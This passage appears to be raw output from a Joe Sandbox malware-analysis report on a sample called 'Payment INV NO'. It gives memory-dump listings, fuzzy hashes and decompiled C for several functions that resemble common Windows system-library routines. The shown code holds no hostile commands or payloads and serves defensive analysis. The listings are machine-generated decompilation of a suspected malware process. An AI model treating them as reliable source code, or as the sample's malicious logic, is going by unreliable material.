                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 957b90157d987a6d9a82abd96569337b70098e19e5201d10afb34ee5f4068ba7
                                                          • Instruction ID: 67f8a15e781792e39010a5bcbab89672eb261785653c18f67773513453e4cd38
                                                          • Opcode Fuzzy Hash: 957b90157d987a6d9a82abd96569337b70098e19e5201d10afb34ee5f4068ba7
                                                          • Instruction Fuzzy Hash: 96218E72A00119AFC715DF58CD81B6EBBBDFB45708F25406CEA09AB252D371EE118B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01794B94 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E01794B94(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				signed int _t42;
				intOrPtr* _t46;
				intOrPtr* _t47;
				signed short _t50;
				intOrPtr _t51;
				signed int _t52;
				signed int _t54;
				intOrPtr _t56;
				signed int _t57;
				intOrPtr _t58;
				intOrPtr* _t59;

				_t58 = __ecx;
				_t56 =  *[fs:0x30];
				_v20 = __ecx;
				_v16 = _t56;
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t50 =  *(__ecx + 0x24) & 0x0000ffff;
				} else {
					_t50 =  *(__ecx + 0x7c) & 0x0000ffff;
				}
				_t38 =  *(_t56 + 0x88);
				if(_t38 == 0 || _t50 == 0) {
					L8:
					return _t38;
				} else {
					_t54 = _t50 & 0x0000ffff;
					if(_t54 > _t38) {
						goto L8;
					}
					_t51 =  *((intOrPtr*)(_t56 + 0x90));
					_v8 = _t38;
					_t46 = _t51 + _t54 * 4;
					_v12 = _t46;
					_t47 = _t46 + 0xfffffffc;
					_t11 =  &_v8;
					 *_t11 = _v8 - _t54;
					if( *_t11 != 0) {
						_t59 = _v12;
						_t57 = _v8;
						do {
							_t39 =  *_t59;
							_t59 = _t59 + 4;
							 *_t47 = _t39;
							if( *((intOrPtr*)(_t39 + 8)) == 0xddeeddee) {
								_t52 =  *(_t39 + 0x24) & 0x0000ffff;
							} else {
								_t52 =  *(_t39 + 0x7c) & 0x0000ffff;
							}
							E01794C73(_t39, _t52, _t52 - 1);
							_t41 =  *_t47;
							if( *((intOrPtr*)(_t41 + 8)) == 0xddeeddee) {
								 *((intOrPtr*)(_t41 + 0x24)) =  *((intOrPtr*)(_t41 + 0x24)) + 0xffff;
							} else {
								 *((intOrPtr*)(_t41 + 0x7c)) =  *((intOrPtr*)(_t41 + 0x7c)) + 0xffff;
							}
							_t47 = _t47 + 4;
							_t57 = _t57 - 1;
						} while (_t57 != 0);
						_t56 = _v16;
						_t58 = _v20;
						_t38 =  *(_t56 + 0x88);
						_t51 =  *((intOrPtr*)(_t56 + 0x90));
					}
					_t42 = _t38 - 1;
					 *(_t56 + 0x88) = _t42;
					 *(_t51 + _t42 * 4) =  *(_t51 + _t42 * 4) & 0x00000000;
					if( *((intOrPtr*)(_t58 + 8)) == 0xddeeddee) {
						 *((short*)(_t58 + 0x24)) = 0;
						return 0;
					}
					 *((short*)(_t58 + 0x7c)) = 0;
					return 0;
				}
			}





















                                                          0x01794b9d
                                                          0x01794ba0
                                                          0x01794ba7
                                                          0x01794bb1
                                                          0x01794bb4
                                                          0x017f0b4d
                                                          0x01794bba
                                                          0x01794bba
                                                          0x01794bba
                                                          0x01794bbe
                                                          0x01794bc6
                                                          0x01794c0c
                                                          0x01794c0c
                                                          0x01794bcd
                                                          0x01794bcd
                                                          0x01794bd2
                                                          0x00000000
                                                          0x00000000
                                                          0x01794bd4
                                                          0x01794bdb
                                                          0x01794bde
                                                          0x01794be1
                                                          0x01794be4
                                                          0x01794be7
                                                          0x01794be7
                                                          0x01794bea
                                                          0x01794c0d
                                                          0x01794c10
                                                          0x01794c13
                                                          0x01794c13
                                                          0x01794c15
                                                          0x01794c18
                                                          0x01794c21
                                                          0x01794c5f
                                                          0x01794c23
                                                          0x01794c23
                                                          0x01794c23
                                                          0x01794c2a
                                                          0x01794c2f
                                                          0x01794c3d
                                                          0x01794c65
                                                          0x01794c3f
                                                          0x01794c3f
                                                          0x01794c3f
                                                          0x01794c43
                                                          0x01794c46
                                                          0x01794c46
                                                          0x01794c4b
                                                          0x01794c4e
                                                          0x01794c51
                                                          0x01794c57
                                                          0x01794c57
                                                          0x01794bec
                                                          0x01794bed
                                                          0x01794bf4
                                                          0x01794bff
                                                          0x01794c6d
                                                          0x00000000
                                                          0x01794c6d
                                                          0x01794c03
                                                          0x00000000
                                                          0x01794c03

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be039c21412206f03258b38c48bd730f8b7be0bbe1998d3b1572028778da135b
                                                          • Instruction ID: 460146755829e7f1fee9cda93873878023f35e15b46146782a967f3f149da479
                                                          • Opcode Fuzzy Hash: be039c21412206f03258b38c48bd730f8b7be0bbe1998d3b1572028778da135b
                                                          • Instruction Fuzzy Hash: 6431CE31900AA5DFDB28CF68D680679F7F4FF49210F1486A9C86A97660E770A946CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A28AE Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017A28AE(signed int __edx) {
				void* _t14;
				char* _t17;
				signed char* _t27;
				void* _t31;
				signed int _t35;
				signed char* _t37;
				char* _t39;

				_t35 = __edx;
				_t14 = E017B7D50();
				_t39 = 0x7ffe0384;
				if(_t14 != 0) {
					_t17 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t17 = 0x7ffe0384;
				}
				_t37 = 0x7ffe0385;
				if( *_t17 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
						if(E017B7D50() == 0) {
							_t27 = 0x7ffe0385;
						} else {
							_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t27 & 0x00000020) != 0) {
							L01817016(0x1480, _t35, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				_t31 = E017AEEF0(0x1885350);
				if(E017B7D50() != 0) {
					_t39 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t39 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
						if(E017B7D50() != 0) {
							_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t37 & 0x00000020) != 0) {
							L01817016(0x1481, _t35 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				return _t31;
			}










                                                          0x017a28ae
                                                          0x017a28b3
                                                          0x017a28b8
                                                          0x017a28bf
                                                          0x017f7692
                                                          0x017a28c5
                                                          0x017a28c5
                                                          0x017a28c5
                                                          0x017a28ca
                                                          0x017a28cf
                                                          0x017f76a9
                                                          0x017f76b6
                                                          0x017f76c8
                                                          0x017f76b8
                                                          0x017f76c1
                                                          0x017f76c1
                                                          0x017f76cd
                                                          0x017f76e3
                                                          0x017f76e3
                                                          0x017f76cd
                                                          0x017f76a9
                                                          0x017a28df
                                                          0x017a28e8
                                                          0x017f76f7
                                                          0x017f76f7
                                                          0x017a28f1
                                                          0x017f770f
                                                          0x017f771c
                                                          0x017f7727
                                                          0x017f7727
                                                          0x017f7730
                                                          0x017f7746
                                                          0x017f7746
                                                          0x017f7730
                                                          0x017f770f
                                                          0x017a28fc

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1bf00f247357898de87c672d24c5e0c93b5f4cea98695641becfeb3fe7184507
                                                          • Instruction ID: f339559a1ccc7e2f6089612186455f186d09097bd238493d132f4a1c2628e3ff
                                                          • Opcode Fuzzy Hash: 1bf00f247357898de87c672d24c5e0c93b5f4cea98695641becfeb3fe7184507
                                                          • Instruction Fuzzy Hash: D421F332645781DBF726976C8C48F25BB94AF81B74F2807A4FA209B7E3DB689840C211
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BF716 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = 0x177504c;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = 0x177504c;
						_t13 = 0x177504c;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}










                                                          0x017bf71d
                                                          0x017bf722
                                                          0x017bf726
                                                          0x01804770
                                                          0x017bf765
                                                          0x017bf769
                                                          0x017bf769
                                                          0x017bf732
                                                          0x0180477a
                                                          0x00000000
                                                          0x0180477a
                                                          0x017bf738
                                                          0x017bf73a
                                                          0x017bf73c
                                                          0x017bf746
                                                          0x017bf778
                                                          0x017bf7a9
                                                          0x017bf7a9
                                                          0x017bf754
                                                          0x017bf75a
                                                          0x017bf75d
                                                          0x017bf75f
                                                          0x017bf761
                                                          0x017bf76f
                                                          0x017bf771
                                                          0x017bf771
                                                          0x017bf76f
                                                          0x017bf763
                                                          0x00000000
                                                          0x017bf763
                                                          0x017bf77d
                                                          0x017bf7a3
                                                          0x017bf7a5
                                                          0x00000000
                                                          0x017bf7a5
                                                          0x017bf77f
                                                          0x017bf782
                                                          0x017bf784
                                                          0x017bf786
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017bf788
                                                          0x017bf748
                                                          0x017bf74d
                                                          0x017bf78d
                                                          0x017bf793
                                                          0x017bf7b7
                                                          0x017bf7bc
                                                          0x00000000
                                                          0x017bf7bc
                                                          0x017bf798
                                                          0x00000000
                                                          0x00000000
                                                          0x017bf79d
                                                          0x017bf7b0
                                                          0x00000000
                                                          0x017bf7b0
                                                          0x017bf79f
                                                          0x00000000
                                                          0x017bf74f
                                                          0x017bf74f
                                                          0x00000000
                                                          0x017bf74f

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c6ae7926a33040bdf8ad2bd7e4138c76df8dbe83e5659a12af8310e087f045a
                                                          • Instruction ID: b964ed79e73da07452eb45fe2be4349a8aafe0697b326634e5427cf683ace5bf
                                                          • Opcode Fuzzy Hash: 8c6ae7926a33040bdf8ad2bd7e4138c76df8dbe83e5659a12af8310e087f045a
                                                          • Instruction Fuzzy Hash: FF1190353056029BEB254E1D8CD07B6F695EB96E24FB445EAE961CB391DB70C8408380
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179519E Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E0179519E(signed short* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t17;
				signed int _t18;
				char _t27;
				signed short _t32;
				signed short* _t34;
				signed char _t35;

				_t34 = __ecx;
				_t27 = 0;
				_t29 = 0;
				_t35 = E017952A5(0);
				if(_t35 == 0) {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_v12 =  *((intOrPtr*)(_t29 + 0x24));
					_t17 =  *((intOrPtr*)(_t29 + 0x28));
				} else {
					_v12 =  *((intOrPtr*)(_t35 + 0xc));
					_t17 =  *((intOrPtr*)(_t35 + 0x10));
				}
				_t32 = _v12;
				_v8 = _t17;
				_t18 =  *_t34 & 0x0000ffff;
				if(_t32 <= 6) {
					if(_t32 != _t18) {
						goto L4;
					}
					goto L10;
				} else {
					_t29 = (_t32 & 0x0000ffff) - 2;
					if((_t32 & 0x0000ffff) - 2 == _t18) {
						_v12 = _t32 + 0xfffe;
						L10:
						_t18 = E017B9DA0(_t29,  &_v12, _t34, 1);
						if(_t18 != 0) {
							_t27 = 1;
						}
					}
					L4:
					if(_t35 == 0) {
						E017AEB70(_t29, 0x18879a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t18 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t35 + 4)));
							E017D95D0();
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t35);
						}
					}
					return _t27;
				}
			}











                                                          0x017951a9
                                                          0x017951ab
                                                          0x017951ad
                                                          0x017951b4
                                                          0x017951b8
                                                          0x017f0c9c
                                                          0x017f0ca2
                                                          0x017f0ca5
                                                          0x017951be
                                                          0x017951c1
                                                          0x017951c4
                                                          0x017951c4
                                                          0x017951c7
                                                          0x017951cb
                                                          0x017951ce
                                                          0x017951d5
                                                          0x017f0cbe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017951db
                                                          0x017951de
                                                          0x017951e3
                                                          0x017f0cb5
                                                          0x017f0cc4
                                                          0x017f0ccb
                                                          0x017f0cd2
                                                          0x017f0cd8
                                                          0x017f0cd8
                                                          0x017f0cd2
                                                          0x017951e9
                                                          0x017951eb
                                                          0x017f0ce4
                                                          0x017951f1
                                                          0x017951f4
                                                          0x017951f8
                                                          0x017f0cee
                                                          0x017f0cf1
                                                          0x017f0d03
                                                          0x017f0d03
                                                          0x017951f8
                                                          0x01795206
                                                          0x01795206

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
